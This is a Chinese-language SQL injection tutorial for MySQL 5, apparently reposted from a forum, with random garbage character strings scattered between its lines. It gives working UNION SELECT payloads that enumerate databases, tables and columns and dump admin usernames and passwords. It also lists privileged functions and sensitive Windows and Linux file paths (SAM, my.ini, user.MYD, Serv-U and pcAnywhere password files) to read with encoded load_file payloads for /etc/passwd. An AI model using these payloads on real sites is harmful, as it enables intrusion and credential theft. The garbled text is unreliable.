mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
( v' `. \+ K! m) W  w  T& F; j+ Z! j3 O* |
/ W  e9 `  J- i& x

Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
6 F  c* p! E3 w# g中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
7 r; G6 _2 R* E, H1.得到所有数据库名：
|SCHEMATA ->存储数据库名的表
: U* i9 _* }4 Z5 o$ Y|—字段：SCHEMA_NAME ->数据库名称
. i. O. A+ ^% y7 @
3 M; Q" @+ K( A|TABLES ->存储表名
- X* y0 ~; |. v|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名

|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
! d3 V3 X6 {+ G1 g9 M  N|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
* Z" O  q3 {6 y, h/ u  b  ^
#########################################################################
##
2 a: k' _: b( @4 D
! F/ A# c. F' q1 V+ P; U7 D" v7 A0 |0×001 获取系统信息:
1 _0 j. q/ D1 w) k/ L( D8 o+ K
( w! k+ I% F6 K4 e; ^union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
) k  Q0 s4 J( `+ R* c  G(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*

* H' C9 @. `' r' i/*
8 ?, \9 {! [4 l8 r3 P
# p; x# P9 R# ^% w$ Y@@global.version_compile_os 获取系统版本
+ B  Q. d1 d8 m- c7 o  w
@@datadir 数据库路径
database() 当前数据库名称
5 N" ?2 }' l: `- U0x3c62723e 换行HEX值
( H# i5 ?5 B& l& r2 T
*/

######################################################################
2 K2 ?8 L! A. c3 D
5 ~. P9 T  e, d7 v0×002 获取表名

union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
, B, _1 G1 _: c% Z4 M/ K" {  linformation_schema.tables where table_schema=0x67617264656e /*

/*

0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
0 m8 e, }/ m9 m
$ u) l& K! c: G6 @6 k*/
& Y2 v# _( C+ x8 ~; p, @/ C
  R/ J* M$ ~; N######################################################################
4 ~1 D" B2 G1 B# l9 ?# v( _
0×003 获取字段
/ w% ?6 _2 J7 ^0 y6 b8 G  H1 M8 F
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
9 V* n4 I; B5 S, g  G+ g! Q9 h
- W( U  {9 G# [2 {) F) I5 O' q
table_schema=0x67617264656e limit 1 /*

6 P. K8 i/ o' x$ l" {& R/ j/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
* K9 K; @+ ~! C* X* O# V
* _0 i7 K/ F# D0x67617264656e ->数据库名

*/
5 g9 f; C0 r; g$ L2 \2 |9 x. L
- P8 |3 w4 y) s5 I& n$ C# t#####################################################################

  v: K  J- }" D0×004 获取数据

union select 1,2,3
, i. C" t; G$ Y& j& P! C,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
7 [/ d9 X8 i7 i! ~& I! b, @
0 b! P! H, o. B" c9 r) |# Runion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

: }' d* e- Y: h, w. K/*

* `5 |2 ~! l, w1 G2 R7 G8 _: `0x3c62723e 换行符号HEX编码

4 u4 J( L2 H9 \/ \group_concat 同时获得该字段所有数据
& x1 ^6 O% t0 j( K7 A' K: K
*/


' |$ A% X: u  B6 P  R5 U

/ |, P% @9 S3 w9 @) c! ?3 I7 A3 @
9 G2 Z! A# h7 n) Y! ~7 _- P顺便添加一些mysql注入时非常有用的一些东西
- h- I- R- X1 F# X- g
简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
, Q3 k8 H& ~2 ^7 y- x( c3:current_user()  当前用户名
9 X& m  J& ~! b7 w4:session_user()连接数据库的用户名
5:database()    数据库名
4 ]4 |% v  f. ?; Q6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
9 ]& `" V% @9 g' e8@datadir     读取数据库路径
7 c) v, d3 W* r! U8 F& t  Y/ T* d% d9@basedir    MYSQL 安装路径
- j7 v1 E6 v7 f$ _10@version_compile_os   操作系统  Windows Server 2003,
7 K, k7 g$ r; J! n" l/ d/ O6 X# ~收集的一些路径：
WINDOWS下:
3 B7 h6 z; ^! a5 ^& Sc:/boot.ini          //查看系统版本
1 ~9 I( L3 y" F" o, \) qc:/windows/php.ini   //php配置信息
  v3 b( C, {- D$ N6 U2 Fc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
# m) S, k# |; z! u# A" Hc:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
2 x5 M6 X* A7 A- D9 C; E" X! M/ _c:\Program Files\Serv-U\ServUDaemon.ini
2 @+ {# }, ]& C& [c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
, r2 B( b4 v7 @0 \) tc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
8 _) D/ `0 Q, O5 o$ Dc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
6 J5 u: f8 i6 F* d/ B4 }% Z

/ R4 M% @& O5 t* k' Mc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
$ T  O  l4 W) @d:\APACHE\Apache2\conf\httpd.conf
8 M& B0 U; [! iC:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
. c+ m4 {! z0 H; z9 D6 d
LUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
. k. I4 P, B; S9 y$ z  b" W( _7 ]/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
& e8 Z: r2 v# m8 V1 B. K6 G' I/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
: x3 U$ q1 _2 \  ?/etc/rsyncd.conf //同步程序配置文件
9 j; |+ z  _. V( I! P) L/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
) V) R# M  G8 h1 c& v/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
) X4 q8 W6 h6 l" [3 ]/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  K# a' w/ o- M& x" o* u0 ~4 _3 |/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
) v. w$ e0 t% w5 M3 U" s/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
' H+ F' R0 P: h" q1 m/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
# X! b% q5 {  k# J- s1 g1 {9 u/etc/sysconfig/iptables 查看防火墙策略
! x4 X6 h; [' L( Z8 [  Pload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
( `, _. a! `) {" _% ^9 |replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3 z8 y" q+ J+ L6 i+ C2 g